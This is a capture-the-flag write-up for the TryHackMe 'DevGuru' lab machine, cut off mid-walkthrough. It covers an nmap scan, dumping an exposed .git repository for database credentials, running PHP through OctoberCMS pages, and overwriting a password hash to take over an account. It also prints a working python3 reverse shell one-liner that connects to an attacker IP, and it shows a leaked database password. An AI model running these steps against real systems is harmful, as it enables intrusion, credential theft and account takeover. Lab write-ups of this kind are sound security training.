CTF-Writeups/TryHackMe/DevGuru.md
2020-12-08 00:40:59 +05:00

8.3 KiB

TryHackMe-DevGuru

NMAP

Nmap scan report for 10.10.172.205                                                                                                          [83/877]
Host is up (0.16s latency).                                                                                                                         
Not shown: 65532 closed ports                                                                                                                       
PORT     STATE SERVICE VERSION                                                                                                                      
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey:                                                            
|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)                                                                                      
|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_  256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru                                                 
| http-git: 
|   10.10.172.205:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit 
|     Remotes:
|       http://devguru.local:8585/frank/devguru-website.git
|_    Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK                                                                                                                       [54/877]
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=f886af904a2de78a; Path=/; HttpOnly
|     Set-Cookie: _csrf=5bPJDT7tyJUhTZEjhejaOuL5wHU6MTYwNzE2ODk5ODQ5MDExOTg3MQ; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 05 Dec 2020 11:49:58 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1"> 
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=f1edb5b66713a6a2; Path=/; HttpOnly
|     Set-Cookie: _csrf=5rcSOwMuyIXJxXduyRO14YPZQT06MTYwNzE2ODk5ODgzMzcyMzg5Mg; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1"> 
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :

PORT 80

We don't see anything interesting on the web page. Looking at the nmap results there's a git directory we find so let's visit that directory

On visting find a page which tells us a reference to master branch

So it seems that there is a github repository on the box , so let's try to dump the files. We can use a tool for that which is called GitTools

https://github.com/internetwache/GitTools

After running the tool it took 22 minutes for me dump the ./git directory

Now we cannot extract some useful data like this for that we have to use Extractor from GitTools

First move that dumped ./git folder to a another folder then run the tool

As you can see it finds a bunch of files which makes our work way easier

Reading through the contents of .htaccess we find that there is a login page for database

Going back to that extracted folder of ./git we can find config/database.php which has credentials for mysql database

And we can login ourself in , Great !

Now Octobercms has blocked extensions of php files , you could try changing the extensions to .php3,.php4,.php5,.phtml but it won't work , what we can do is run php code on html pages

https://octobercms.com/forum/post/running-php-code-on-pages

Here it tells how we can do that

As we can see it does run php code so now we have to craft a php reverse shell to get onto the box,Let's test this for a simple $_GET["command"]

And we can run system commands so only thing left to do is to setup a netcat listener and run a reverse shell command in that parameter.So I am going to use a python3 reverse shell because python3 is installed on the box

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we got a shell finally , sweet !!

Now we must enumerate the box , to do that transfer linpeas on the target box by python http server

During the enumaration process we find some intersting backup files

Here we can see that there is another database for gitea which is running on port 8585,also we look at the bottom we'll find that we can use three hashing algorithms bcrypt,pbkdf2 and scrypt

So let's login to the database like we did with octoberdb

Here I cloned the frank user but added a bcrpyt password for him because with pbkdf2 it was not allowing me to login

DB_TYPE             = mysql
HOST                = 127.0.0.1:3306                                      
NAME                = gitea
USER                = gitea                                                                                                                         
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD              = UfFPTF8C8jjxVF2m    

Here we can find the password for frank but it's saved as bcrypt because of $2$ at the beginning.It would be useless to try cracking the hash we can just add a user with the password encrypted with bcrypt

Then if we try to login we can access the dashboard of OctoberCMS

By going to Settings then Event log we can see there's an image